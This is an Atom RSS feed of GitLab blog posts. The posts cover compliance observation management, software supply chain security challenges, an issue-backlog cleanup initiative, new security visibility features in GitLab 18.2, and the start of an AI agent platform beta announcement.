<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>https://about.gitlab.com/blog</id>
    <title>GitLab</title>
    <updated>2025-07-29T14:39:59.954Z</updated>
    <generator>https://github.com/jpmonette/feed</generator>
    <author>
        <name>The GitLab Team</name>
    </author>
    <link rel="alternate" href="https://about.gitlab.com/blog"/>
    <link rel="self" href="https://about.gitlab.com/atom.xml"/>
    <subtitle>GitLab Blog RSS feed</subtitle>
    <icon>https://about.gitlab.com/favicon.ico</icon>
    <rights>All rights reserved 2025</rights>
    <entry>
        <title type="html"><![CDATA[How to transform compliance observation management with GitLab]]></title>
        <id>https://about.gitlab.com/blog/how-to-transform-compliance-observation-management-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/how-to-transform-compliance-observation-management-with-gitlab/"/>
        <updated>2025-07-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>An observation is a compliance finding or deficiency identified during control monitoring. This is essentially a gap between what your security controls should be doing and what they're actually doing. Observations can stem from design deficiencies where the control isn't structured properly to meet requirements, operating effectiveness issues where the control exists but isn't working as intended, or evidence gaps where required documentation or proof of control execution is missing.</p>
<p>These observations emerge from our quarterly control monitoring process, where we systematically assess the effectiveness of security controls supporting our certifications (SOC 2, ISO 27001, etc.). Observations can also be the output of our external audits from third-party assessors. Observations aren't just compliance checkboxes, they represent real security risks that need prompt, visible remediation.</p>
<p>Observation management is the process by which we manage these observations from identification through remediation to closure. In this article, you'll learn how the GitLab Security Team uses the DevSecOps platform to manage and remediate observations, and the efficiencies we've realized from doing so.</p>
<h2>The GitLab observation lifecycle: From identification to resolution</h2>
<p>The lifecycle of an observation encompasses the entire process from initial identification by compliance engineers through to completed remediation by remediation owners. This lifecycle enables real-time transparent status reporting and that is easier for all stakeholders to understand and follow.</p>
<p>Here are the stages of the observation lifecycle:</p>
<p><strong>1. Identification</strong></p>
<ul>
<li>Compliance engineers identify potential observations during quarterly monitoring.</li>
<li>Initial validation occurs to confirm the finding represents a genuine control gap.</li>
<li>Detailed documentation begins immediately in a GitLab issue.</li>
<li>The root cause of the observation is determined and a remediation plan to address the root cause is established.</li>
</ul>
<p><strong>2. Validation</strong></p>
<ul>
<li>Issue is assigned to the appropriate remediation owner (usually a team lead or department manager).</li>
<li>Remediation owner reviews and confirms they understand and accept ownership.</li>
<li>The remediation plan is reviewed, prioritized, and updated collaboratively as needed.</li>
</ul>
<p><strong>3. In-progress</strong></p>
<ul>
<li>Active remediation work begins with clear milestones and deadlines.</li>
<li>Regular updates are provided through GitLab comments and status changes.</li>
<li>Collaboration happens transparently where all stakeholders can see progress.</li>
</ul>
<p><strong>4. Remediated</strong></p>
<ul>
<li>Remediation owner marks work complete and provides evidence.</li>
<li>Issue transitions to compliance review for validation.</li>
</ul>
<p><strong>5. Resolution</strong></p>
<ul>
<li>Compliance engineer verifies exit criteria are met.</li>
<li>The issue is closed with final documentation.</li>
<li>Lessons learned are captured for future prevention.</li>
</ul>
<p><strong>Alternative paths</strong> handle blocked work, risk acceptance decisions, and stalled remediation efforts with appropriate escalation workflows.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753301753/pbvheikwpivuvhzd5ith.png" alt="Example of observation lifecycle">
&lt;center&gt;&lt;i&gt;Example of observation lifecycle&lt;/i&gt;&lt;/center&gt;</p>
<h2>The power of transparency in GitLab</h2>
<p>Effective observation management shouldn't require detective work to determine basic information like ownership, status, or priority. Yet most organizations find themselves exactly in this scenario: compliance teams chasing updates, operational teams unaware of their responsibilities, and leadership lacking visibility into real risk exposure until audit season arrives.</p>
<p>The Security Compliance team at GitLab faced these exact problems. Our team initially used a dedicated GRC tool as the single source of truth for outstanding observations, but the lack of visibility to key stakeholders meant minimal remediation actually occurred. The team found themselves spending their time on administrative work, rather than guiding remediation efforts.</p>
<p>Our solution was to move observation management directly into GitLab issues within a dedicated project. This approach transforms observations from compliance issues into visible, actionable work items that integrate naturally into development and operations workflows. Every stakeholder can see what needs attention, collaborate on remediation plans, and track progress in real time, creating the transparency and accountability that traditional tools simply can't deliver.</p>
<h3>Smart organization through labels and issue boards</h3>
<p>GitLab allows teams to categorize observation issues into multiple organizational views. The Security Compliance team uses the following to categorize observations:</p>
<ul>
<li><strong>Workflow:</strong> <code>~workflow::identified</code>, <code>~workflow::validated</code>, <code>~workflow::in progress</code>, <code>~workflow::remediated</code></li>
<li><strong>Department:</strong> <code>~dept::engineering</code>, <code>~dept::security</code>, <code>~dept::product</code></li>
<li><strong>Risk Severity:</strong> <code>~risk::critical</code>, <code>~risk::high</code>, <code>~risk::medium</code>, <code>~risk::low</code></li>
<li><strong>System:</strong> <code>~system::gitlab</code>, <code>~system::gcp</code>, <code>~system::hr-systems</code></li>
<li><strong>Program:</strong> <code>~program::soc2</code>, <code>~program::iso</code>, <code>~program::fedramp</code> , <code>~program::pci</code></li>
</ul>
<p>These labels are then leveraged to create issue boards:</p>
<ul>
<li><strong>Workflow boards</strong> visualize the observation lifecycle stages.</li>
<li><strong>Department boards</strong> show each team's remediation workload.</li>
<li><strong>Risk-based boards</strong> prioritize critical findings requiring immediate attention.</li>
<li><strong>System boards</strong> visualize observations by system.</li>
<li><strong>Program boards</strong> track certification-specific observation resolution.</li>
</ul>
<p>Labels enable powerful filtering and reporting while supporting automated workflows through our triage bot policies. Please refer to the automation section for more details on our automation strategy.</p>
<h2>Automation: Working smarter, not harder</h2>
<p>Managing dozens of observations across multiple certifications requires smart automation. The Security Compliance team utilizes the <a href="https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage">triage bot</a>, which is an open source project hosted in GitLab. The triage bot gem aims to enable project managers to automatically triage issues in GitLab projects or groups based on defined policies. This helps manage issue hygiene so stakeholders can focus their efforts on remediation.</p>
<p>Within the observation management project, we have policies written to ensure there is an assignee on each issue, each issue has required labels, issues are updated every 30 days, and blocked and stalled issues are nudged every 90 days. In addition, a weekly summary issue is created to summarize all the issues out of compliance based on our defined policies. This enables team members to monitor issues efficiently and spend less time on administrative tasks.</p>
<h2>Measuring success: Key metrics and reporting</h2>
<p>GitLab's raw issue data can be leveraged into actionable intelligence. Organizations can extract meaningful insights from issue creation date, closed date, last updated date, and labels. The following metrics provide a comprehensive view of your observation management effectiveness:</p>
<p><strong>Resolution Efficiency Analysis:</strong> Average time from identification to resolution by department and severity</p>
<p>Track issue creation versus close dates across departments and severity levels to identify bottlenecks and measure performance against SLAs. This reveals which teams excel at rapid response and which may need additional resources or process improvements.</p>
<p><strong>Real-Time Risk Assessment:</strong> Current risk profile based on open critical and high risk observations</p>
<p>Leverage risk level labels to create dynamic visualizations of your organization's current risk exposure. This provides leadership with an immediate understanding of critical observations requiring urgent attention.</p>
<p><strong>Strategic Resource Allocation:</strong> Department-level risk distribution for targeted improvement efforts</p>
<p>Identify which departments are responsible for remediation of the highest-risk observations to prioritize resources, oversight, and projects. This data-driven approach ensures improvement efforts focus where they'll have maximum impact.</p>
<p><strong>Compliance Readiness Monitoring:</strong> Certification-specific observation counts and resolution rates</p>
<p>Utilize certification labels to assess audit preparedness and track progress toward compliance goals. This metric provides early warning of potential certification risks and validates remediation efforts.</p>
<p><strong>Accountability Tracking:</strong> Overdue remediations</p>
<p>Monitor SLA compliance to ensure observations receive timely attention. This metric highlights systemic delays and enables proactive intervention before minor issues become major problems.</p>
<p><strong>Engagement Health Check:</strong> Observation freshness</p>
<p>Track recent activity (updates within 30 days) to ensure observations remain actively managed rather than forgotten. This metric identifies stagnant issues that may require escalation or reassignment.</p>
<h2>Advanced strategies: Taking observation management further</h2>
<p>Here's what you can do to deepen the impact of observation management in your organization.</p>
<p><strong>Integrate with security tools</strong></p>
<p>Modern observation management extends beyond manual tracking by connecting with your existing security infrastructure. Organizations can configure vulnerability scanners and security monitoring tools to automatically generate observation issues, eliminating manual data entry and ensuring comprehensive coverage.</p>
<p><strong>Apply predictive analytics</strong></p>
<p>Historical observation data becomes a powerful forecasting tool when properly analyzed. Organizations can leverage past remediation patterns to predict future timelines and resource requirements, enabling more accurate project planning and budget allocation. Pattern recognition in observation types reveals systemic vulnerabilities that warrant preventive controls, shifting focus from reactive to proactive risk management. Advanced implementations incorporate multiple data sources into sophisticated risk scoring algorithms that provide nuanced threat assessments and priority rankings.</p>
<p><strong>Customize for stakeholders</strong></p>
<p>Effective observation management recognizes that different roles require different perspectives on the same data. Role-based dashboards deliver tailored views for executives seeking high-level risk summaries, department managers tracking team performance, and individual contributors managing their assigned observations. Automated reporting systems can be configured to match various audience needs and communication preferences, from detailed technical reports to executive briefings. Self-service analytics capabilities empower stakeholders to conduct ad-hoc analysis and generate custom insights without requiring technical expertise or support.</p>
<h2>Move from mere compliance to operational excellence</h2>
<p>GitLab's approach to observation management represents more than a tool change, it's a fundamental shift from reactive compliance to proactive risk mitigation. By breaking down silos between compliance teams and operational stakeholders, organizations achieve unprecedented visibility while dramatically improving remediation outcomes.</p>
<p>The results are measurable: faster resolution through transparent accountability, active stakeholder collaboration instead of reluctant participation, and continuous audit readiness rather than periodic scrambles. Automated workflows free compliance professionals for strategic work while rich data enables predictive analytics that shift focus from reactive firefighting to proactive prevention.</p>
<p>Most importantly, this approach elevates compliance from burden to strategic enabler. When observations become visible, trackable work items integrated into operational workflows, organizations develop stronger security culture and lasting improvements that extend beyond any single audit cycle. The outcome isn't just regulatory compliance. It's organizational resilience and competitive advantage through superior risk management.</p>
<blockquote>
<p>Want to learn more about GitLab's security compliance practices? Check out our <a href="https://handbook.gitlab.com/handbook/security/security-assurance/security-compliance/">Security Compliance Handbook</a> for additional insights and implementation guidance.</p>
</blockquote>
]]></content>
        <author>
            <name>Madeline Lake</name>
            <uri>https://about.gitlab.com/blog/authors/madeline-lake</uri>
        </author>
        <published>2025-07-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Software supply chain security guide: Why organizations struggle]]></title>
        <id>https://about.gitlab.com/blog/software-supply-chain-security-guide-why-organizations-struggle/</id>
        <link href="https://about.gitlab.com/blog/software-supply-chain-security-guide-why-organizations-struggle/"/>
        <updated>2025-07-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Ask most development teams about supply chain security, and you'll get answers focused on vulnerability scanning or dependency management. While these are components of supply chain security, they represent a dangerously narrow view of a much broader challenge.</p>
<p><strong>Supply chain security isn't just about scanning dependencies.</strong> It encompasses the entire journey from code creation to production deployment, including:</p>
<ul>
<li><strong>Source security:</strong> protect code repositories, managing contributor access, ensuring code integrity</li>
<li><strong>Build security:</strong> secure build environments, preventing tampering during compilation and packaging</li>
<li><strong>Artifact security:</strong> ensure the integrity of containers, packages, and deployment artifacts</li>
<li><strong>Deployment security:</strong> secure the delivery mechanisms and runtime environments</li>
<li><strong>Tool security:</strong> harden the development tools and platforms themselves</li>
</ul>
<p>The &quot;chain&quot; in supply chain security refers to this interconnected series of steps. A weakness anywhere in the chain can compromise the entire software delivery process.</p>
<p>The <a href="https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure-security">2020 SolarWinds attack</a> illustrates this perfectly. In what became one of the largest supply chain attacks in history, state-sponsored attackers compromised the build pipeline of SolarWinds' Orion network management software. Rather than exploiting a vulnerable dependency or hacking the final application, they injected malicious code during the compilation process itself.</p>
<p>The result was devastating: More than 18,000 organizations, including multiple U.S. government agencies, unknowingly installed backdoored software through normal software updates. The source code was clean, the final application appeared legitimate, but the build process had been weaponized. This attack remained undetected for months, demonstrating how supply chain vulnerabilities can bypass traditional security measures.</p>
<h3>Common misconceptions that leave organizations vulnerable</h3>
<p>Despite growing awareness of supply chain threats, many organizations remain exposed because they operate under fundamental misunderstandings about what software supply chain security actually entails. These misconceptions create dangerous blind spots:</p>
<ul>
<li>Thinking software supply chain security equals dependency scanning</li>
<li>Focusing only on open source components while ignoring proprietary code risks</li>
<li>Believing that code signing alone provides sufficient protection</li>
<li>Assuming that secure coding practices eliminate supply chain risks</li>
<li>Treating it as a security team problem rather than a development workflow challenge</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753200077/kqndvlxyvncshdiq0xea.png" alt="Software supply chain security dependency chart"></p>
<h2>How AI is changing the game</h2>
<p>Just as organizations are grappling with traditional software supply chain security challenges, artificial intelligence (AI)  is introducing entirely new attack vectors and amplifying existing ones in unprecedented ways.</p>
<h3>AI-powered attacks: More sophisticated, more scalable</h3>
<p>Attackers are using AI to automate vulnerability discovery, generate convincing social engineering attacks targeting developers, and systematically analyze public codebases for weaknesses. What once required manual effort can now be done at scale — with precision.</p>
<h3>The AI development supply chain introduces new risks</h3>
<p>AI is reshaping the entire development lifecycle, but it's also introducing significant security blind spots:</p>
<ul>
<li><strong>Model supply chain attacks:</strong> Pre-trained models from sources like Hugging Face or GitHub may contain backdoors or poisoned training data.</li>
<li><strong>Insecure AI-generated code:</strong> Developers using AI coding assistants may unknowingly introduce vulnerable patterns or unsafe dependencies.</li>
<li><strong>Compromised AI toolchains:</strong> The infrastructure used to train, deploy, and manage AI models creates a new attack surface.</li>
<li><strong>Automated reconnaissance:</strong> AI enables attackers to scan entire ecosystems to identify high-impact supply chain targets.</li>
<li><strong>Shadow AI and unsanctioned tools:</strong> Developers may integrate external AI tools that haven't been vetted.</li>
</ul>
<p>The result? AI doesn't just introduce new vulnerabilities, it amplifies the scale and impact of existing ones. Organizations can no longer rely on incremental improvements. The threat landscape is evolving faster than current security practices can adapt.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753200139/xuxezxld6ztlvjocgjlx.png" alt="AI amplification effect"></p>
<h2>Why most organizations still struggle</h2>
<p>Even organizations that understand supply chain security often fail to act effectively. The statistics reveal a troubling pattern of awareness without corresponding behavior change.</p>
<p>When <a href="https://www.cnn.com/2021/05/19/politics/colonial-pipeline-ransom/index.html">Colonial Pipeline paid hackers $4.4 million</a> in 2021 to restore operations, or when 18,000 organizations fell victim to the SolarWinds attack, the message was clear: Supply chain vulnerabilities can bring down critical infrastructure and compromise sensitive data at unprecedented scale.</p>
<p>Yet, despite this awareness, most organizations continue with business as usual. The real question isn't whether organizations care about supply chain security — it's why caring alone isn't translating into effective protection.</p>
<p>The answer lies in four critical barriers that prevent effective action:</p>
<p><strong>1. The false economy mindset</strong></p>
<p>Organizations sometimes focus on the cost instead of &quot;what's the most effective approach?&quot; This cost-first thinking creates expensive downstream problems.</p>
<p><strong>2. Skills shortage reality</strong></p>
<p>With <a href="https://codific.com/bsimm-building-security-in-maturity-model-a-complete-guide/">organizations averaging 4 security professionals per 100 developers</a>, according to BSIMM research, and <a href="https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen">90% of organizations reporting critical cybersecurity skills gaps</a>, according to ISC2, traditional approaches are mathematically impossible to scale.</p>
<p><strong>3. Misaligned organizational incentives</strong></p>
<p>Developer OKRs focus on feature velocity while security teams measure different outcomes. When C-suite priorities emphasize speed-to-market over security posture, friction becomes inevitable.</p>
<p><strong>4. Tool complexity overload</strong></p>
<p>The <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-03-gartner-identifiesthe-top-cybersecurity-trends-for-2025">average enterprise uses 45 cybersecurity tools</a>, with <a href="https://www.ponemon.org/news-updates/blog/security/new-ponemon-study-on-malware-detection-prevention-released.html">40% of security alerts being false positives</a> and must <a href="https://newsroom.ibm.com/2020-06-30-IBM-Study-Security-Response-Planning-on-the-Rise-But-Containing-Attacks-Remains-an-Issue">coordinate across 19 tools on average for each incident</a>.</p>
<p>These barriers create a vicious cycle: Organizations recognize the threat, invest in security solutions, but implement them in ways that don't drive the desired outcomes.</p>
<h2>The true price of supply chain insecurity</h2>
<p>Supply chain attacks create risk and expenses that extend far beyond initial remediation. Understanding these hidden multipliers helps explain why prevention is not just preferable – it's essential for business continuity.</p>
<p><strong>Time becomes the enemy</strong></p>
<ul>
<li>Average time to identify and contain a supply chain breach: <a href="https://keepnetlabs.com/blog/171-cyber-security-statistics-2024-s-updated-trends-and-data">277 days</a></li>
<li>Customer trust rebuilding period: <a href="https://www.bcg.com/publications/2024/rebuilding-corporate-trust">2-3+ years</a></li>
<li>Engineering hours diverted from product development to security remediation</li>
</ul>
<p><strong>Reputation damage compounds</strong></p>
<p>When attackers compromise your supply chain, they don't just steal data – they undermine the foundation of customer trust. <a href="https://www.metacompliance.com/blog/data-breaches/5-damaging-consequences-of-a-data-breach">Customer churn rates typically increase 33% post-breach</a>, while partner relationships require costly re-certification processes. Competitive positioning suffers as prospects choose alternatives perceived as &quot;safer.&quot;</p>
<p><strong>Regulatory reality bites</strong></p>
<p>The regulatory landscape has fundamentally shifted. <a href="https://www.skillcast.com/blog/20-biggest-gdpr-fines">GDPR fines now average over $50 million for significant data breache</a>s. The EU's new <a href="https://about.gitlab.com/blog/gitlab-supports-banks-in-navigating-regulatory-challenges/#european-cyber-resilience-act-(cra)">Cyber Resilience Act</a> mandates supply chain transparency. U.S. federal contractors must provide software bills of materials (<a href="https://about.gitlab.com/blog/the-ultimate-guide-to-sboms/">SBOMs</a>) for all software purchases — a requirement that's rapidly spreading to private sector procurement.</p>
<p><strong>Operational disruption multiplies</strong></p>
<p>Beyond the direct costs, supply chain attacks create operational chaos such as platform downtime during attack remediation, emergency security audits across entire technology stacks, and legal costs from customer lawsuits and regulatory investigations.</p>
<h2>What's wrong with current approaches</h2>
<p>Most organizations confuse security activity with security impact. They deploy scanners, generate lengthy reports, and chase teams to address through manual follow-ups. But these efforts often backfire — creating more problems than they solve.</p>
<h3>Massive scanning vs. effective protection</h3>
<p>Enterprises generate over <a href="https://www.securityweek.com/enterprises-generate-10000-security-events-day-average-report/">10,000 security alerts each month, with the most active generating roughly 150,000 events per day.</a> <a href="https://panther.com/blog/identifying-and-mitigating-false-positive-alerts">But 63%</a> of these are false positives or low-priority noise. Security teams become overwhelmed and turn into bottlenecks instead of enablers.</p>
<h3>The collaboration breakdown</h3>
<p>The most secure organizations don't have the most tools; they have the strongest DevSecOps collaboration. But most current setups make this harder by splitting workflows across incompatible tools, failing to show developers security results in their environment, and offering no shared visibility into risk and business impact.</p>
<h2>The path forward</h2>
<p>Understanding these challenges is the first step toward building effective supply chain security. The organizations that succeed don't just add more security tools, they fundamentally rethink how security integrates with development workflows. They also review end-to-end software delivery workflows to simplify processes, reduce tools and improve collaboration.</p>
<p>At GitLab, we've seen how integrated DevSecOps platforms can address these challenges by bringing security directly into the development workflow. In our next article in this series, we'll explore how leading organizations are transforming their approach to supply chain security through developer-native solutions, AI-powered automation, and platforms that make security a natural part of building great software.</p>
<blockquote>
<p>Learn more about <a href="https://about.gitlab.com/solutions/supply-chain/">GitLab's software supply chain security capabilities</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Itzik Gan Baruch</name>
            <uri>https://about.gitlab.com/blog/authors/itzik-gan baruch</uri>
        </author>
        <published>2025-07-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Inside GitLab's Healthy Backlog Initiative]]></title>
        <id>https://about.gitlab.com/blog/inside-gitlabs-healthy-backlog-initiative/</id>
        <link href="https://about.gitlab.com/blog/inside-gitlabs-healthy-backlog-initiative/"/>
        <updated>2025-07-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we are proud of the strong, collaborative relationship with our community. We encourage everyone to contribute to GitLab. Over the years, those community contributions have helped strengthen the GitLab platform. But as we've grown, community participation via GitLab issues has grown, resulting in an unwieldy issue backlog.</p>
<p>GitLab's Product and Engineering teams recently launched the <a href="https://gitlab.com/groups/gitlab-org/-/epics/18639">Healthy Backlog Initiative</a> to address this backlog and refine our approach to managing contributed issues going forward.</p>
<p>Issues with ongoing community engagement, recent activity, or a clear strategic alignment will remain open. We'll be closing issues that are no longer relevant, lack community interest, or no longer fit our current product direction.</p>
<p>This focus will lead to increased innovation, better expectation setting, and faster development and delivery cycles of community-contributed capabilities.</p>
<h2>What is the Healthy Backlog Initiative?</h2>
<p>Over time, the GitLab community has submitted tens of thousands of issues, including bugs, feature requests, and feedback items. Currently, the <a href="https://gitlab.com/gitlab-org/gitlab/-/issues">main GitLab issue tracker</a> contains over 65,000 issues, some are no longer applicable to the platform and others remain relevant today.</p>
<p>Our Healthy Backlog Initiative will cull the backlog and establish a workstream for our Product and Engineering teams to implement a more focused approach to backlog management. They will conduct weekly assessments of the backlog to ensure that we prioritize issues that align with our product strategy and roadmap.</p>
<p><strong>Note:</strong> If you believe a closed issue does align with GitLab’s product strategy and roadmap, or if you're actively contributing to the request, we strongly encourage you to comment on the issue with updated context and current details. We are committed to reviewing these updated issues as part of our regular assessment efforts.</p>
<h2>How does this change benefit you?</h2>
<p>This streamlined approach means direct, tangible improvements for every GitLab user:</p>
<ul>
<li>
<p><strong>Sharper focus and faster delivery:</strong> By narrowing our backlog to strategically aligned features, we can dedicate development resources more effectively. This means you can expect shorter development cycles and more meaningful improvements to your GitLab experience.</p>
</li>
<li>
<p><strong>Clearer expectations:</strong> We are committed to transparent communication about what's on our roadmap and what isn't, empowering you to make informed decisions about your workflows and contributions.</p>
</li>
<li>
<p><strong>Accelerated feedback loops:</strong> With a clean backlog, new feedback and feature requests will be reviewed and prioritized more efficiently, reducing overall triage time and ensuring timely issues receive the necessary attention. This creates a more responsive feedback loop for everyone.</p>
</li>
</ul>
<p>This initiative does not diminish the significance of community feedback and contributions. We are taking this action to create clarity around what GitLab Team Members can realistically commit to delivering, and to ensure that all feedback receives proper consideration.</p>
<h2>Looking forward</h2>
<p>The GitLab Healthy Backlog Initiative reflects our commitment to being transparent and effective stewards of the GitLab platform. By clearly communicating our priorities and focusing our efforts on what we can realistically deliver over the next year, we're better positioned to meet and exceed your expectations.</p>
<p>Your continued participation and feedback help make GitLab stronger. Every comment, merge request, bug report, and feature suggestion contributes to our shared vision. And we’re still rewarding you for that as well, with initiatives like our monthly Notable Contributor program, Swag rewards for leveling up, Hackathon winners, and more, all available through our <a href="https://contributors.gitlab.com">Contributor Portal</a>.</p>
<blockquote>
<p>To learn more about how to contribute to GitLab, <a href="https://about.gitlab.com/community/">visit our community site</a>. To share feedback on this project, please add your comments on <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/556865">the feedback issue</a> in this <a href="https://gitlab.com/groups/gitlab-org/-/epics/18639">epic</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Stan Hu</name>
            <uri>https://about.gitlab.com/blog/authors/stan-hu</uri>
        </author>
        <published>2025-07-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Bridging the visibility gap in software supply chain security]]></title>
        <id>https://about.gitlab.com/blog/bridging-the-visibility-gap-in-software-supply-chain-security/</id>
        <link href="https://about.gitlab.com/blog/bridging-the-visibility-gap-in-software-supply-chain-security/"/>
        <updated>2025-07-21T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Our most recent release, <a href="https://about.gitlab.com/releases/2025/07/17/gitlab-18-2-released/">GitLab 18.2</a>, introduces two new capabilities to improve software supply chain security: Security Inventory and Dependency Path visualization.</p>
<p>Security Inventory gives Application Security teams a centralized, portfolio-wide view of risk and scan coverage across their GitLab groups and projects, helping them identify blind spots and prioritize risk mitigation efforts. Dependency Path visualization equips developers with a clear view of how open source vulnerabilities are introduced through the dependency chain, making it easier to pinpoint the right fix.</p>
<p>Together, these capabilities help security and development teams build more secure applications by providing visibility into where risks exist, context to remediate them, and workflows that support collaboration. Unlike other solutions, this all happens in the same platform developers use to build, review, and deploy software, creating a developer and AppSec experience without the overhead of integrations.</p>
<h2>Open source widens the attack surface area</h2>
<p>Modern applications <a href="https://about.gitlab.com/developer-survey/">heavily</a> rely on open source software. However, open source introduces a significant security risk — components can be outdated, unmaintained, or unknowingly expose vulnerabilities. That's why Software Composition Analysis (SCA) has become a cornerstone of modern AppSec programs.</p>
<p>A key challenge in vulnerability management is effectively managing <em>transitive dependency risk</em>. These components are often buried deep in the dependency chain, making it difficult to trace how a vulnerability was introduced or determine what needs to be updated to fix it. Worse, they account for nearly <a href="https://arxiv.org/abs/2503.22134?">two-thirds</a> of known open source vulnerabilities. Without clear visibility into the full dependency path, teams are left guessing, delaying remediation and increasing risk.</p>
<blockquote>
<p>Transitive dependencies are packages that your application uses indirectly. They're pulled in automatically by the direct dependencies you explicitly include. These nested dependencies can introduce vulnerabilities without the developer ever knowing they're in the project.</p>
</blockquote>
<p>This challenge becomes exponentially more difficult at scale. When security teams are responsible for hundreds, or even thousands, of repositories — each with their own dependencies, build pipelines, and owners — answering fundamental questions on application security risk posture becomes challenging. And in an era of growing software supply chain threats, where vulnerabilities can propagate across systems through shared libraries and CI/CD configurations, these blind spots take on even greater consequence.</p>
<h2>Security Inventory: Visibility that scales</h2>
<p>Security Inventory consolidates risk information across all your groups and projects into a unified view. It highlights which assets are covered by security scans and which aren't. Rather than managing issues in isolation, security teams can assess posture holistically and identify where to focus efforts.</p>
<p>This level of centralization is especially critical for organizations managing a large number of repositories. It allows platform and AppSec teams to understand where risk exists by highlighting unscanned or underprotected projects, but also enables them to take action directly from the interface. Teams can go beyond just awareness to enforcement with the full context and understanding of which applications pose the greatest risk. By turning fragmented insights into a single source of truth, Security Inventory enables organizations to move from reactive issue triage to strategic, data-driven security governance.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753101068/qhujktnbkhl2rzgqfead.png" alt="Security Inventory display">
Learn more by watching Security Inventory in action:
&lt;!-- blank line --&gt; &lt;figure class=&quot;video_container&quot;&gt; &lt;iframe src=&quot;https://www.youtube.com/embed/yqo6aJLS9Fw?si=CtYmsF-PLN1UKt83&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt; &lt;/figure&gt; &lt;!-- blank line --&gt;</p>
<h2>Dependency Path visualization: Clarity for effective remediation</h2>
<p>Security Inventory shows where the risks are at a high level; Dependency Path visualization shows how to fix them.</p>
<p>When a vulnerability is discovered deep in a dependency chain, identifying the correct fix can be complicated. Most security tools will highlight the affected package but stop short of explaining how it entered the codebase. Developers are left guessing which dependencies are directly introduced and which are pulled in transitively, making it difficult to determine where a change is needed, or worse, applying patches that don't address the root cause.</p>
<p>Our new Dependency Path visualization, sometimes referred to as a dependency graph, displays the full route from a top-level package to the vulnerable component following an SCA scan. This clarity is essential, especially given how pervasive deeply embedded vulnerabilities are in dependency chains. And since it's built into the GitLab workflow, developers gain actionable insight without context switching or guesswork. Security teams can more effectively triage issues while developers get assurance that remediations are addressing root causes.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753101069/kf5ym62gylm5ck6iebjk.png" alt="Dependency path visualization"></p>
<h2>Mitigate risk with developer-first security</h2>
<p>These capabilities are part of GitLab's broader strategy to deliver security within the same platform where code is planned, built, and deployed. By embedding security insights into the DevSecOps workflow, GitLab reduces friction and drives collaboration between development and security teams.</p>
<p>Security Inventory and Dependency Path visualization provide complementary perspectives: the former enables scale-aware oversight, the latter supports precision fixes. This alignment helps teams prioritize what matters most and close gaps without adding new tools or complex integrations.</p>
<blockquote>
<p>Get started with Security Inventory and Dependency Path visualization today! Sign up for a <a href="https://about.gitlab.com/free-trial/">free trial of GitLab Ultimate</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li>
<p><a href="https://about.gitlab.com/releases/2025/07/17/gitlab-18-2-released/">GitLab 18.2 released</a></p>
</li>
<li>
<p><a href="https://about.gitlab.com/solutions/security-compliance/">GitLab security solutions</a></p>
</li>
<li>
<p><a href="https://about.gitlab.com/the-source/security/field-guide-to-threat-vectors-in-the-software-supply-chain/">A field guide to threat vectors in the sofware supply chain</a></p>
</li>
</ul>
]]></content>
        <author>
            <name>Salman Ladha</name>
            <uri>https://about.gitlab.com/blog/authors/salman-ladha</uri>
        </author>
        <published>2025-07-21T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform Public Beta: Next-gen AI orchestration and more]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-public-beta/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-public-beta/"/>
        <updated>2025-07-17T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>We're building the future of software development.</strong></p>
<p>At GitLab, we are <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">reimagining the future of software engineering</a> as a human and AI collaboration. Where developers focus on solving technical, complex problems and driving innovation, while AI agents handle the routine, repetitive tasks that slow down progress. Where developers are free to explore new ideas in code at much lower cost, bug backlogs are a thing of the past, and users of the software you build enjoy a more usable, reliable, and secure experience. This isn't a distant dream. We're building this reality today, and it is called the GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform is our next-generation DevSecOps orchestration platform designed to unlock asynchronous collaboration between developers and AI agents. It will transform your development workflow from isolated linear processes into dynamic collaboration where specialized AI agents work alongside you and your team on every stage of the software development lifecycle; it will be like having an unlimited team of colleagues at your disposal.</p>
<p>Imagine delegating a complex refactoring task to a Software Developer Agent while simultaneously having a Security Analyst Agent scan for vulnerabilities and a Deep Research Agent analyze progress across your repository history. This all happens in parallel, orchestrated seamlessly within GitLab.</p>
<p>Today, we are announcing the launch of the <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">first public beta of the GitLab Duo Agent Platform</a> for GitLab.com and self-managed GitLab Premium and Ultimate customers. This is just the first in a series of updates that will improve how software gets planned, built, verified, and deployed as we amplify human ingenuity through intelligent automation.</p>
